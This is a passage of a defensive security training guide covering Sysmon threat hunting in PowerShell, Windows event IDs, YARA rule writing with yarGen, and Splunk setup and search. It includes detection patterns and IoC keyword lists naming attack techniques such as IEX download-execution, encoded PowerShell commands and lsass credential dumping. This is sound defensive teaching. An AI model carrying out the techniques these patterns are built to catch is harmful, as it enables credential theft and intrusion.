HKCU\Software\Microsoft\Windows\CurrentVersion\R
un .
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -in 12, 13, 14 -and $_.Message -match "Software\\Microsoft\\Windows\\CurrentVersion\\Run" }
This query will show registry modifications related to
startup applications, which are commonly used for
persistence.
Tracking Credential Dumping
Look for suspicious process access attempts to processes
like   lsass.exe ,   which are often targeted in credential
dumping attacks.
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 10 -and $_.Message -match "lsass.exe" }
Processes attempting to read       lsass.exe     memory are
often linked to credential dumping tools, such as
Mimikatz.
Proactive Threat Hunting Techniques
Baseline Normal Activity
To effectively hunt for anomalies, establish baselines for
normal behavior in your environment. Monitor typical
processes, network activity, and registry modifications
for specific systems and users. Deviations from this
baseline can then be prioritized for deeper investigation.
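As a rough sketch of what a baseline query can look like, the snippet below tallies which executables launch most often over a week; the regex that pulls the Image field out of the event message is an assumption about the message format:

```powershell
# Count process-creation events (Sysmon Event ID 1) per executable over 7 days
Get-WinEvent -FilterHashtable @{
    LogName   = "Microsoft-Windows-Sysmon/Operational"
    Id        = 1
    StartTime = (Get-Date).AddDays(-7)
} |
    ForEach-Object {
        # Extract the Image field from the message text (assumed format)
        if ($_.Message -match "Image:\s*(?<img>\S+)") { $Matches["img"] }
    } |
    Group-Object | Sort-Object Count -Descending |
    Select-Object -First 20 Count, Name
```

Processes that fall outside this top-talker list, or appear for the first time, are natural candidates for deeper investigation.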
Use YARA Rules and Sysmon Configurations
Integrate YARA rules to detect specific malware signatures
and Sysmon configurations that filter for high-risk events.
For instance, you can set Sysmon to log only events
relevant to known attack techniques and exclude noise,
increasing the efficiency of your hunting efforts.
Look for Command-Line Obfuscation
Command-line obfuscation, like using encoded PowerShell
commands or bypassing execution policies, is common in
malware. Search for command-line strings containing flags
such as   -EncodedCommand   or   -ExecutionPolicy Bypass .
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 1 -and $_.Message -match "-EncodedCommand" }
Search for Suspicious Parent-Child Process
Relationships
Some parent-child process pairs are suspicious, such as
winword.exe    spawning   powershell.exe ,   which can
indicate malware executed from a malicious document.
 Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
     Where-Object { $_.Id -eq 1 -and $_.Message -match "winword.exe.*powershell.exe" }
Automating Threat Hunting with Scripts
Create PowerShell scripts that automatically query Sysmon
logs for known IoCs or patterns, then run these scripts
regularly or schedule them with Task Scheduler.
Example script for basic threat hunting:
 # Define suspicious keywords or patterns
 $iocPatterns = @("Invoke-Expression", "EncodedCommand", "powershell.*IEX", "winword.exe.*powershell.exe")

 # Check Sysmon logs for each pattern
 foreach ($pattern in $iocPatterns) {
     Write-Output "Searching for pattern: $pattern"
     Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" |
         Where-Object { $_.Message -match $pattern } |
         Format-Table TimeCreated, Id, Message -AutoSize
 }
Integrating Sysmon with SIEM for
Centralized Monitoring
For enterprise environments, it’s recommended to
centralize Sysmon logs in a SIEM for better analysis and
correlation. Integrate Sysmon with a SIEM such as Splunk,
ELK Stack, or Azure Sentinel for improved monitoring and
alerting capabilities.
Benefits of SIEM Integration:
     Centralized Logging: Aggregate Sysmon logs from
     multiple endpoints for holistic analysis.
     Correlating Events: Cross-reference Sysmon logs
     with other security logs (e.g., firewall, AV) to
     detect patterns and anomalies.
     Automated Alerting: Create SIEM rules to trigger
     alerts based on Sysmon event patterns.
Sample SIEM Queries
     Detect PowerShell Abuse:
 index=sysmon EventID=1 Image="*powershell.exe"
 CommandLine="*EncodedCommand*"
     Detect Network Connections to Suspicious IPs:
 index=sysmon EventID=3 DestinationIp="1.2.3.4"
Replace   "1.2.3.4"   with a known malicious IP.
Common Sysmon Event IDs for Reference
Here are a few commonly used Sysmon event IDs you may
want to filter by:
     Event ID 1: Process Creation
     Event ID 2: File Creation Time Change
     Event ID 3: Network Connection Detected
     Event ID 11: File Creation
     Event ID 12, 13, 14: Registry Events (Object added,
     removed, modified)
     Event ID 17: Pipe Created
     Event ID 18: Pipe Connected
     Event ID 19, 20: WMI Event (EventFilter,
     EventConsumer)
The following are Windows event log IDs (from the
Security and PowerShell logs, not Sysmon) that are often
used alongside Sysmon data:
Group policy modification
Event ID 4719
Event ID 4739
User created or added
Event ID 4720
Failed authentication (failed logon)
Event ID 4625
Account logon
Event ID 4624
Account logoff
Event ID 4634
Process creation
Event ID 4688
PowerShell execution blocked due to restrictive policy
Event ID 4100
Member added to a universal security group
Event ID 4756
Member removed from a universal security group
Event ID 4757
Member added to a global security group
Event ID 4728
Member removed from a global security group
Event ID 4729
Pass The Hash
Passing the hash generates two Event ID 4776 entries on
the Domain Controller: the first is generated during
authentication of the originating (infected) host, and
the second indicates validation of the account from that
originating computer when it accesses the target (victim)
workstation.
Event ID 4776
Event ID 4624 with a Logon Process of NtLmSSP
and/or an Authentication Package of NTLM.
Account Lockout
Event ID 4625 and/or Event ID 4740.
Common Sysmon Event IDs
Event ID 1: Process Creation
Event ID 5: Process Terminated
Event ID 3: Network Connection
Event ID 7: Image Loaded
Event ID 8: CreateRemoteThread [code injection and
process migration operations]
Event ID 11: File Created
Event ID 12 / 13 / 14: Registry Event
Event ID 15: FileCreateStreamHash
Event ID 22: DNS Event
Event ID 13: Registry Value Set
Event ID 4720 (Windows Security): New user created
Event ID 4103 (PowerShell Operational): PowerShell module
logging / pipeline execution details
Event ID 4732 (Windows Security): A member was added to a
security-enabled local group
Event ID 4624 (Windows Security): Successful logon; with
NTLM authentication it can indicate Pass The Hash
Yara Rules
Definition
Yara can identify information based on both binary and
textual patterns, such as hexadecimal byte sequences and
strings contained within a file. It is mainly used to
create detection rules that spot malware based on the
patterns it exhibits, such as strings, IP addresses,
domains, Bitcoin wallet addresses for ransom payments,
and so on. We can create rules in Yara to search for and
spot these patterns.
Creating Yara Rules
Rule file has the extension    .yar       and inside this file we
can store rules. Every rule must have a name and
condition.
Let's say we create a rule file named   test.yar   and we
want to test it on the home directory; we would type the
below command

 yara test.yar /home
#Example
Below is an example of Yara rule
 rule test {
     condition:
         true
 }

The name of the rule in this snippet is   test ,   and it
has one condition - in this case, the condition is simply
true . As previously discussed, every rule requires both
a name and a condition to be valid, and this rule
satisfies both requirements. Simply, the rule checks
whether the file/directory/PID that we specify exists via
condition: true . If the target exists, Yara reports the
rule name   test   as a match. If it does not exist, Yara
will output an error.
You can then test the rule via the command shown above,
specifying the file/directory/PID whose existence you
want to check.
Components of a Yara Rule
#Meta
This section of a Yara rule is reserved for descriptive
information by the author of the rule. For example, you
can use    desc ,   short for description, to summarise what
your rule checks for. Anything within this section does not
influence the rule itself. Similar to commenting code, it is
useful to summarise your rule.
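For illustration, a meta section (all field names and values below are arbitrary choices by the rule author) could look like this:

```yara
rule meta_example {
    meta:
        desc = "Detects the fictional ExampleLoader sample"
        author = "Analyst Name"
        date = "2024-01-01"
    condition:
        true
}
```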
#Conditions
Common condition keywords and operators include:
true
any of them
<= less than or equal to
>= more than or equal to
!= not equal to
And to combine conditions, we use the below keywords
and
or
not
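A small sketch of combining conditions with these keywords (the string names are hypothetical):

```yara
rule combined_example {
    strings:
        $ps = "powershell"
        $enc = "-EncodedCommand"
    condition:
        // fire only when both strings are present
        $ps and $enc
}
```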
#Strings
We can use strings to search for specific text or
hexadecimal values in files or programs. For example, say
we wanted to search a directory for all files containing
"Hello World!"; we would create a rule such as the one
below. We define the   strings   section, where the
string we want to search for, i.e., "Hello World!", is
stored within the variable   $hello_world .   We still
need a condition to make the rule valid; to match on a
string, the condition references the variable's name, in
this case   $hello_world .   The condition   any of
them   allows any of multiple defined strings to match
 rule helloworld_checker{
     strings:
         $hello_world = "Hello World!"
         $hello_world_lowercase = "hello world"
         $hello_world_uppercase = "HELLO WORLD"
        condition:
            any of them
 }
Yara Scanners
LOKI
LOKI is a free open-source IOC (Indicator of Compromise)
scanner. Its detection is based on four factors
     1. File Name IOC Check
     2. Yara Rule Check
     3. Hash Check
     4. C2 Back Connect Check
        Link
 https://github.com/Neo23x0/Loki/releases
Usage
 python loki.py -h
Scanning the home directory for IOCs
 python loki.py -p /home/
THOR
THOR is an IOC (indicator of compromise) and Yara
scanner. There are precompiled versions for Windows,
Linux, and macOS. A nice feature of THOR Lite is its
scan throttling to limit exhausting CPU resources.
Link
 https://www.nextron-systems.com/thor-lite/
yarGen
yarGen is a generator for YARA rules: it builds rules
from strings found in malware files while removing all
strings that also appear in goodware files. For this
purpose, yarGen ships with a large database of goodware
strings and opcodes as ZIP archives that have to be
extracted before first use.
Link
 https://github.com/Neo23x0/yarGen
Update on first use
 python3 yarGen.py --update
Generate a Yara rule from a malicious file
 python3 yarGen.py -m directory --excludegood -
 o file.yar
      -m    is the path to the files you want to generate
     rules for
      --excludegood      force to exclude all goodware
     strings (these are strings found in legitimate
     software and can increase false positives)
      -o    location & name you want to output the Yara
     rule
VALHALLA
Valhalla is an online Yara feed where we can search or
look up Yara rules by keyword, tag, ATT&CK technique,
sha256, or rule name.
Link
 https://valhalla.nextron-systems.com/
Yara Rules with YaraGen for Malware
Detection
Using YARA rules and YaraGen for malware detection is an
effective method for identifying malicious files based on
patterns, characteristics, and behaviors. YARA rules
provide a framework for writing simple but powerful
descriptions of malware patterns, while YaraGen can
assist by automatically generating YARA rules from
malware samples.
Installing YaraGen
   1. Install Python if not already installed.
   2. Install YaraGen by cloning its repository or using
       pip :
 git clone
 https://github.com/Neo23x0/yarGen.git
 cd yarGen
 pip install -r requirements.txt
Running YaraGen
   1. Create a Rule from a Directory of Malware Samples:
 python yarGen.py -m <path_to_malware_samples> -o <output_rule_file.yar>
     This command tells YaraGen to analyze all files in the
     specified malware directory and output a YARA rule
     file with the detected patterns.
     Adding Whitelists:
     To reduce false positives, yarGen can drop strings
     that also appear in its goodware-strings database by
     forcing their exclusion:

 python yarGen.py -m <path_to_malware_samples> --excludegood -o <output_rule_file.yar>
Customizing Output Options:
     Fewer, Higher-Scoring Strings: raise the minimum
     string score so only the most distinctive patterns
     are kept, reducing noise:

 python yarGen.py -m <path_to_malware_samples> -z 5 -o <output_rule_file.yar>

Add Metadata: set the author and a reference in the
generated rules' meta section:

 python yarGen.py -m <path_to_malware_samples> -a "Analyst Name" -r "internal-case-2024-01" -o <output_rule_file.yar>
Example Output from YaraGen
YaraGen generates rules that can contain specific strings,
hex patterns, and keywords unique to the malware
sample(s):
 rule MalwareSampleAutoGen
 {
     meta:
         description = "Auto-generated rule for
 malware sample detection"
         author = "Analyst Name"
         date = "2024-01-01"
      strings:
              $s1 = "example_malicious_string"
              $h1 = { E8 03 00 00 00 5D C3 }
       condition:
           any of them
 }
Testing and Fine-Tuning YARA Rules
After generating YARA rules with YaraGen, it’s essential to
test and fine-tune them to avoid false positives and
ensure accuracy.
Testing YARA Rules
     1. Install YARA if not already installed:
 pip install yara-python
   2. Run YARA Against a Sample:
Test the YARA rule against malware and clean files to
check for accuracy.
 yara -r output_rule_file.yar
 <path_to_test_directory>
   3. The   -r   flag enables recursive scanning of
      directories. Review the output to ensure that the
      rule detects only the intended files.
   4. Use a Testing Environment:
      Run your rules against a mixture of malware
      samples and benign files in a controlled
      environment to verify detection rates and reduce
      false positives.
Fine-Tuning YARA Rules
     Remove Overly Broad Strings: YaraGen may include
     common strings that appear in benign files. Remove
     or refine these to avoid false positives.
     Add Conditions: Use conditions like   all of them    or
     any of them    to adjust rule sensitivity.
     Apply Regex Matching: For more specific matches,
     consider using regex in the strings section of the
     rule.
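As an illustrative sketch, a regex string lets a single rule match many variants, here any http/https URL pointing at a bare IP address (the pattern is an example, not a vetted detection):

```yara
rule url_regex_example {
    strings:
        // http:// or https:// followed by a dotted-quad IP
        $ip_url = /https?:\/\/[0-9]{1,3}(\.[0-9]{1,3}){3}/
    condition:
        $ip_url
}
```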
Examples of Advanced YARA Rules for
Malware Detection
Advanced YARA rules can include conditions that detect
specific malware techniques and behaviors:
Detecting Packed Files
 rule PackedFile
 {
     meta:
         description = "Detects files packed
 with common packers"
     strings:
         $UPX = "UPX!"
         $FSG = "FSG!"
     condition:
          any of ($UPX, $FSG)
 }
Detecting Malware Behaviors
 rule SuspiciousNetworkActivity
 {
     meta:
         description = "Detects network
 activity with suspicious keywords"
     strings:
         $url = "http://"
         $cnc = "CommandAndControl"
         $exfil = "exfil"
     condition:
         any of them
 }
Resources
Online Rules Repository
 https://github.com/InQuest/awesome-yara
 https://github.com/Yara-Rules/rules
Documentations
 https://yara.readthedocs.io/en/stable/writingr
 ules.html
Module 6: SIEM and Detection
Engineering
Splunk
Introduction to IPS & IDS
IDS
Intrusion detection systems (IDSs) monitor a network and
send alerts when they detect suspicious events on a
system or network.
An IDS can only detect an attack. It cannot prevent
attacks. Any type of IDS will use various raw data sources
to collect network activity information.
This includes a wide variety of logs, such as firewall
logs, system logs, and application logs. An IDS reports on
events of interest based on rules configured within the
IDS. Not every reported event is an actual attack or
issue; instead, the IDS raises an alert or alarm
indicating that an event might warrant investigation. The
notification can come in many forms, including an email
to a group of administrators, a text message, a pop-up
window, or a notification on a central monitor.
Types of Alerts
False positive
A false positive occurs when an IDS or IPS sends an
alarm or alert when there is no actual attack.
False negative
A false negative occurs when an IDS or IPS fails to
send an alarm or alert even though an attack is active.
True negative
A true negative occurs when an IDS or IPS does not
send an alarm or alert, and there is no actual attack.
True positive
A true positive occurs when an IDS or IPS sends an
alarm or alert after recognizing an attack.
Signature-Based Detection
Signature-based IDSs (sometimes called definition-based)
use a database of known vulnerabilities or known attack
patterns. The process is very similar to what antivirus
software uses to detect malware. You need to update
both IDS signatures and antivirus definitions from the
vendor regularly to protect against current threats.
Behavioral Based Detection
The IDS/IPS starts by identifying the network’s regular
operation or normal behavior. It does this by creating a
performance baseline under normal operating conditions.
The IDS continuously monitors network traffic and
compares current network behavior against the baseline.
When the IDS detects abnormal activity (outside normal
boundaries as identified in the baseline), it gives an alert
indicating a potential attack.
HIDS
A host-based intrusion detection system (HIDS) is
additional software installed on a system such as a
workstation or a server. It protects the individual host,
can detect potential attacks, and protects critical
operating system files.
NIDS
A network-based intrusion detection system (NIDS)
monitors activity on the network. NIDS sensors or
collectors could be installed on network devices such as
switches, routers, or firewalls. These sensors gather
information and report to a central monitoring network
appliance hosting a NIDS console. A NIDS cannot detect
anomalies on individual systems or workstations unless
the anomaly causes a significant difference in network
traffic. Additionally, a NIDS is unable to decrypt encrypted
traffic. In other words, it can only monitor and assess
threats on the network from traffic sent in plaintext or
non-encrypted traffic.
Port Mirroring
Port mirroring allows us to configure the switch to send
all traffic the switch receives to a single port. After
configuring a port mirror, you can use it as a tap to send
all switch data to a sensor or collector and forward this
to a NIDS console. Similarly, it’s possible to configure
port taps on routers to capture all traffic sent through the
router and send it to the IDS.
IPS
Intrusion prevention systems (IPSs) react to attacks in
progress and prevent them from reaching systems and
networks. An IPS prevents attacks by detecting them and
stopping them before they
reach the target.
IPS vs IDS
An IPS can detect, react to, and prevent attacks.
An IPS is inline with the traffic. In other words, all traffic
passes through the IPS, and the IPS can block malicious
traffic.
Because an IPS is inline with the traffic, it is sometimes
referred to as active.
An IDS monitors and will respond after detecting an
attack, but it doesn’t prevent attacks.
An IDS is out-of-band. It monitors the network traffic, but
the traffic doesn’t go through the IDS.
An IDS is referred to as passive because it is not
inline with the traffic. Instead, it is out-of-band with the
network traffic.
Definitions
Host
It's the name of the physical or virtual device where an
event originates. It can be used to find all data originating
from a specific device.
Source
It's the name of the file, directory, data stream, or other
input from which a particular event originates.
Sources are classified into    source types ,   which can be
either well known formats or formats defined by the user.
Some common source types are HTTP web server logs and
Windows event logs.
Tags
A tag is a knowledge object that enables you
to search for events that contain particular field
values. You can assign one or more tags to any
field/value combination, including event types,
hosts, sources, and source types. Use tags to
group related field values together, or to track
abstract field values such as IP addresses or ID
numbers by giving them more descriptive names.
Indexes
When data is added, Splunk software parses
the data into individual events, extracts the
timestamp, applies line-breaking rules, and
stores the events in an index. You can create new
indexes for different inputs. By default, data is
stored in the “main” index. Events are retrieved
from one or more indexes during a search.
Splunk Forwarder
A Splunk instance that forwards data to another
Splunk instance is referred to as a forwarder.
Splunk Indexer
An indexer is the Splunk instance that indexes data.
The indexer transforms the raw data into events
and stores the events into an index. The indexer
also searches the indexed data in response to
search requests. The search peers are indexers that
fulfill search requests from the search head.
Splunk Search Head
In a distributed search environment, the search
head is the Splunk instance that directs search
requests to a set of search peers and merges
the results back to the user. If the instance
does only search and not indexing, it is usually
referred to as a dedicated search head.
In other words, it's where we execute queries to
retrieve insights from the loaded data.
Search Processing Language
It's the language used to perform search operations in
Splunk. SPL or Splunk processing language consists of
keywords, quoted phrases, Boolean expressions,
wildcards,parameter/value pairs, and comparison
expressions.
Unless you’re joining two explicit Boolean expressions,
omit the AND operator, because Splunk treats the space
between any two search terms as AND.
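For example, the following two searches are equivalent, since the space between search terms is treated as an implicit AND (index and field values here are illustrative):

```spl
index=data sourcetype=suricata src=10.0.0.5
index=data AND sourcetype=suricata AND src=10.0.0.5
```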
Basic Search Commands
eval
Calculates an expression
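A minimal sketch, assuming the events carry a numeric bytes field, creating a new calculated field:

```spl
index=data | eval megabytes=round(bytes/1024/1024, 2)
```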
*
search through all available logs
rare
Used to find uncommon events. It's the opposite of the
top command explained below; it returns the least
frequent values.
top
Returns the most common events. By default it returns the
top 10 values, but this can be adjusted with the limit
keyword.
Below we return the top 8 usernames.
 index=data | top limit=8 username
timechart
Track occurrences of events over time
stats
Gather general statistical information about a search.
head
Include only the first few values found within my search
tail
Include only the last few values found within my search
transaction
The transaction command gives us an easy way to group
events together based on one or more fields and returns a
field called duration that calculates the difference between
the first and last event in a transaction.
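A sketch, assuming the events carry a clientip field, grouping each client's events into transactions and keeping those that spanned more than 60 seconds:

```spl
index=data
| transaction clientip
| where duration > 60
| table clientip duration
```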
dedup
Removes duplicates from a search result.
Below query retrieves events from the index and shows
unique events IDs in a table alongside the associated user.
 index=data | table EventID User|dedup EventID
head/tail N
Returns the first/last N results.
sort
Sorts the search results by the specified fields.
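For example, sorting descending by a computed count (the - prefix reverses the sort order):

```spl
index=data | stats count by User | sort - count
```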
stats
Provides statistics, grouped optionally by fields. See
COMMON STATS FUNCTIONS.
table
Specifies fields to keep in the result set. Retains data in
tabular format.
Below query retrieves data from the index and shows
EventID and username fields in a table.
 index=data | table EventID username
rex
Extract fields according to specified regular expression(s)
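A sketch, assuming the raw events contain text like user=alice; the named capture group becomes a new field that later commands can use:

```spl
index=data
| rex "user=(?<username>\w+)"
| table username
```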
rename
It changes the name of a field in the search results. It
is useful when the field name is generic or too long, or
when it needs to be updated in the output.
In the below query, we retrieve the events from the index
and rename the field   User    to         Employees
 index=data | rename User as Employees
_time
Usually used to sort the results based on time starting
with the most recent first.
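For example, tabling results with the most recent events first:

```spl
index=data | sort - _time | table _time EventID User
```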
Reverse
Reverses the order of events, showing them from oldest to
the most recent.
Comparison Operators
Equal
This operator is used to match values against the field. In
the example below, it will retrieve all events where the
field domain equals example.com
 domain=example.com
Not Equal to
This operator returns all the events where the domain
value does not match example.com.
 domain!=example.com
Less than
Showing all the events where the id is less than 10.
 id<10
Less than or Equal to
Showing all the events where the id is less than or equal
to 10.
 id<=10
Greater than
Showing all the events where the id is more than 10.
 id>10
Greater than or Equal to
Showing all the events where the id is more than or equal
to 10.
 id>=10
Boolean Operators
NOT
Ignore the events where source IP is localhost
 NOT src.ip=127.0.0.1
OR
Return all the events in which the destination port equals
either 80 or 443.
 dst.port=80 OR dst.port=443
AND
Return all the events in which the source IP is localhost
and the destination port is 80.
 src.ip=127.0.0.1 AND dst.port=80
Statistical Functions
Average
This command is used to calculate the average of the
given field.
 stats avg(price)
Max
It will return the maximum value from the specific field.
 stats max(price)
Min
It will return the minimum value from the specific field.
 stats min(price)
Sum
It will return the sum of the values of a specific field.
 stats sum(price)
Count
The count command returns the number of data
occurrences.
 stats count(ip)
Chart Commands
Chart
Shows the data using charts and other types of
visualization based on a specific field. It is usually
used along with the count command.
Below we chart event counts by user.
 index=data | chart count by User
Timechart
Same as chart but based on time
 index=data | timechart count by User
Log Monitoring
Continuous Log Monitoring From A Log File
We can set up Splunk to import logs from a specific log
file and then continuously import new entries as they are
written. An example would be continuously monitoring a web
server's log files and importing them into Splunk.
   1. Log in to your Splunk server.
   2. From the home launcher in the top-right corner,
      click on the Add Data button.
   3. In the Choose a Data Type list, click on A file or
      directory of files.
   4. Click on Next in the Consume any file on this Splunk
      server option.
   5. Select Preview data before indexing and enter the
      path to the logfile (/var/log/apache2/) and click
       on Continue.
   6. Select Start a new source type and click on
      Continue.
   7. Assuming that you are using the provided file or the
      native /var/log/messages file, the data preview
       will show the correct line breaking of events and
       timestamp recognition. Click on the Continue
       button.
   8. A Review settings box will pop up. Enter
       apache_logs    as the source type and then, click
       on Save source type.
    9. A Sourcetype saved box will appear. Select Create
       input.
  10. In the Source section, select Continuously index
      data from a file or directory this Splunk instance
       can access and fill in the path to your data. If you
       are just looking to do a one-time upload of a file,
       you can select Upload and Index a file instead. This
       can be useful to index a set of data that you would
       like to put into Splunk, either to backfill some
       missing or incomplete data or just to take
       advantage of its searching and reporting tools.
  11. Ignore the other settings for now and simply click
       on Save. Then, on the next screen, click on Start
       searching. In the search bar, enter the following
       search over a time range of All time
        sourcetype=apache_logs
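The same file monitor can also be expressed directly in configuration rather than through the web UI. This is a sketch of the equivalent inputs.conf stanza (the path, sourcetype and index values are assumptions matching the steps above), typically placed under $SPLUNK_HOME/etc/system/local/:

```ini
# Monitor the Apache log directory continuously
[monitor:///var/log/apache2/]
sourcetype = apache_logs
index = main
disabled = false
```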
Continuous Log Monitoring Through
Network Ports
Sending data to Splunk over network ports doesn't need to
be limited to network devices. Applications and scripts
can use socket communication to the network ports that
Splunk is listening on. This can be a very useful tool in
your back pocket, as there can be scenarios where you
need to get data into Splunk but don't necessarily have
the ability to write to a file.
    1. Log in to your Splunk server.
    2. From the home launcher in the top-right corner,
       click on the Add Data button.
In the Or Choose a Data Source list, click on the
From a UDP port or From a TCP port link.
   4. Specify the port that you want Splunk to listen on.
   5. In the Source type section, select From list from
       the Set sourcetype drop-down list, and then,
       select syslog from the Select source type from list
       drop-down list.
   6. Click on Save, and on the next screen, click on
       Start searching. Splunk is now configured to listen
       on the port you assigned in step 4. Any data sent
       to this port now will be assigned the syslog source
       type. To search for the syslog source type, you
       can run the following search    sourcetype=syslog
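As with file monitors, a network input can be defined in inputs.conf instead of the web UI. A sketch, assuming port 5514 was chosen in step 4:

```ini
# Listen for syslog data on TCP port 5514
[tcp://5514]
sourcetype = syslog
# Set the host field from the sender's IP address
connection_host = ip
```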
Continuous Log Monitoring Through Splunk
Universal Forwarder
Splunk Universal Forwarder (UF) can be installed on your
remote endpoint
servers and used to forward data back to Splunk to be
indexed. The Universal Forwarder is similar to the Splunk
server in that it has many of the same
features, but it does not contain Splunk web and doesn't
come bundled with the Python executable and libraries.
Additionally, the Universal Forwarder cannot process data
in advance, such as performing line breaking and
timestamp extraction.
To obtain the Universal Forwarder software, you will need
to go to www.splunk.com/download and register for an
account if you do not already have one. Then, either
download the software directly to your server or download
it to your laptop or workstation and upload it to your
server via a file-transfer process such as SFTP.
1- On the server with the Universal Forwarder installed,
open a command prompt if you are a Windows user or a
terminal window if you are a Unix user.
2- Change to the [$SPLUNK_HOME/bin] directory, where
[$SPLUNK_HOME] is the directory in which the Splunk
forwarder was installed.
For Unix, the default installation directory will be
/opt/splunkforwarder/bin and for Windows, it will be
C:\Program Files\SplunkUniversalForwarder\bin .
3- Start the Splunk forwarder if not already started, using
the following command:    ./splunk start
4- Accept the license agreement.
5- Enable the Universal Forwarder to autostart, using the
following command:    ./splunk enable boot-start
6- Set the indexer that this Universal Forwarder will send
its data to, replacing the host value with that of the
indexer:   ./splunk add forward-server
<host>:<port> -auth <username>:<password> . The
username and password used to log in to the forwarder
default to admin:changeme. Additional
receiving indexers can be added in the same way by
repeating the command in the previous step with a
different indexer host or IP. Splunk will automatically load
balance the forwarded data if more than one receiving
indexer is specified in this manner. Port 9997 is the
default Splunk TCP port and should only be changed if it
cannot be used for some reason.
7- Log in to your receiving Splunk indexer server. From
the home launcher, in the top-right corner click on the
Settings menu item and then select the Forwarding and
receiving link
8- Click on the Configure receiving link.
9- Click on New.
10 - Enter the port you chose in step   6   in the Listen on
this port field.
11- Click on Save and restart Splunk. The Universal
Forwarder is installed and configured to send data to your
Splunk server, and the Splunk server is configured to
receive data on the port you chose in step 6 (9997, the
default Splunk TCP port, unless you changed it).
Splunk Installation
To install Splunk SIEM on your OS, make sure first to
create an account on splunk.com and go to
this Splunk Enterprise download link to select the
installation package for the latest version.
On Linux
Once you have downloaded the compressed file, simply
uncompress it with the below command using elevated
privileges. This step unzips the Splunk installer and
places all the necessary binaries and files on the system
 tar xvzf splunk_installer.tgz
After the installation is complete, a new folder
named splunk is created, which needs to be moved to /opt
 mv splunk /opt/
 cd /opt/splunk/bin
Then run Splunk
 ./splunk start --accept-license
As this is the first time we are starting
the Splunk instance, it will ask the user for admin
credentials. Create a user account and proceed.
At the very end, Splunk will start and print the IP
address and port to log in via your browser.
On Windows
Same as above, from the downloads page of Splunk select
Windows as your OS and download the installer.
Run the downloaded installer. By default, it will
install Splunk in the folder   C:\Program Files\Splunk .
The installer will check the system for dependencies and
will take 5-8 minutes to install the Splunk instance.
The next prompt is to create an administration account;
afterwards Splunk will be up and running, accessible from
the browser.
Splunk listens on port   8000   by default. We can
change the port during the installation process as well. By
default you can open Splunk from the URL below
http://127.0.0.1:8000
Collecting Logs
From Linux Machines
Installing The Forwarder
To collect logs from different machines, we need to install
Splunk universal forwarders, which gather the logs on the
machine they are installed on and send them to Splunk.
Universal forwarders can be downloaded from the
official Splunk website.
Once you download the forwarder, install it with the below
command
 tar xvzf splunkforwarder.tgz
Same as when we first installed Splunk, the above
command will extract all required files into the
folder   splunkforwarder ,  which needs to be moved to
/opt
 mv splunkforwarder /opt/
 cd /opt/splunkforwarder
And then we run the forwarder
 ./bin/splunk start --accept-license
By default, the Splunk forwarder runs on port 8089. If the
system finds the port unavailable, it will ask the user for
a custom port.
Configuring the receiver
To start sending and collecting logs, now log in to the
main Splunk instance running on the main server and from
the menu head to   settings-forwarding and
receiving
Then click on Configure receiving and proceed by
configuring a new receiving port.
By default, the Splunk instance receives data from the
forwarder on the port   9997    which you can always
change. In the next prompt, just enter your preferred port
and the receiver will be up and running.
Creating The Index
The index is used to store the incoming data from the
machines where the forwarder is installed. If we do not
specify an index, it will start storing received data in the
default index, which is called the      main   index.
From the main menu in Splunk, click on         settings-
indexes
Click the New Index button, fill out the form, and
click Save to create the index. Below we named the new
index   Linux_host
Configuring The Forwarder
Back on the forwarder, we need to configure it to send
the logs to the main receiver we set up in the main Splunk
instance
 cd /opt/splunkforwarder/bin
 ./splunk add forward-server 10.10.10.2:9997
10.10.10.2     is the IP of the main Splunk machine.
Next step is to specify which logs need to be monitored
and forwarded to the main Splunk receiver. Linux logs are
stored under   /var/log/
 ./splunk add monitor /var/log/syslog -index
 linux_host
The above command monitors and sends
/var/log/syslog       logs to the main Splunk receiver.
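Once the monitor is in place, a quick search on the receiving Splunk instance confirms that events are arriving in the index created earlier:

```spl
index=linux_host | stats count by host, source
```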
From Windows Machines
Repeat the same steps we followed when installing the
forwarder on the Linux machine, except choose Windows as
the target OS on the downloads page.
Configuring & Installing The Forwarder
After downloading the installer, run it.
With the next prompt, create an account with a username
and password of your choosing.
In the next step, we must specify the server's IP address
and port number to ensure that our Splunk instance gets
the logs from this host. By default, Splunk listens on
port   9997   for any incoming traffic.
Next step is to configure the logs that will be sent to the
main Splunk listener on the main machine.
From the main menu in the main Splunk instance, Click on
Settings -> Add data and choose the     Forward   option to
get the data from Splunk Forwarder.
In the Select Forwarders section, Click on the host that
shows up in the list (there may be many hosts depending
on how many machines you have installed the forwarder
on).
Next we specify what logs and events to collect
Next we create the index that will store the incoming
Event logs. Once created, select the Index from the list
and continue to the review section to finish.
Click on the Start Searching tab. It will take us to the
Search App. If everything goes smoothly, we will receive
the Event Logs immediately.
Operational Notes
     It's vitally important to determine the source of your
     data to be able to correctly pull the logs/events.
     Specify this source as   index=name-of-the-
     datasource .  If you don't know it, you can
     retrieve all data from all sources with   index=* ,  but
     this will return huge amounts of events that you don't
     necessarily need to parse.
     When we are dealing with Windows hosts and looking
     at processes starting, we can view both Windows
     event logs and Sysmon for more information.
     Remember that when searching for backslashes to
     add a second backslash, because a single backslash
     is an escape character and will cause your search to
     not run correctly.
   When we analyze a ransomware attack, one of the
   questions we should ask is what connections are the
   impacted systems making to other systems? File
   shares can be leveraged to inflict greater damage by
   encrypting shared data thus increasing the impact of
   the ransomware beyond the individual host.
    Registry data from Windows systems as well as
    Microsoft Sysmon will provide insight into file shares.
    Oftentimes we will need to determine which
    destinations an infected system communicated with.
    The first time and last time a connection occurred are
    important pieces of information in your investigation
    as well.
    In a host-centric environment, we use hostnames
    more frequently than IP addresses. As we start
    looking at our events from a network-centric
    approach, we need to be aware that we may need to
    search by IP as well.
    IDS/IPS or malware signatures may already exist for
    threats that we need to deal with. Understanding
    which signatures fired is important to establish
    when the threat was seen, where in the network it
    was seen, what technology identified the signature,
    and the nature of the threat.
   Stream is a free app for Splunk that collects wire
   data and can focus on a number of different
   protocols, including but not limited to smtp, tcp, ip,
   http and more
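As a sketch of the backslash point above, searching for a Windows path requires doubling each backslash (the path shown is illustrative):

```spl
index=data sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational
    Image="C:\\Windows\\System32\\cmd.exe"
```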
Using Splunk For Incident Response
Parsing Suricata IDS Logs
When parsing Suricata IDS events, we mostly aim to
extract data about a specific malware/Trojan that triggered
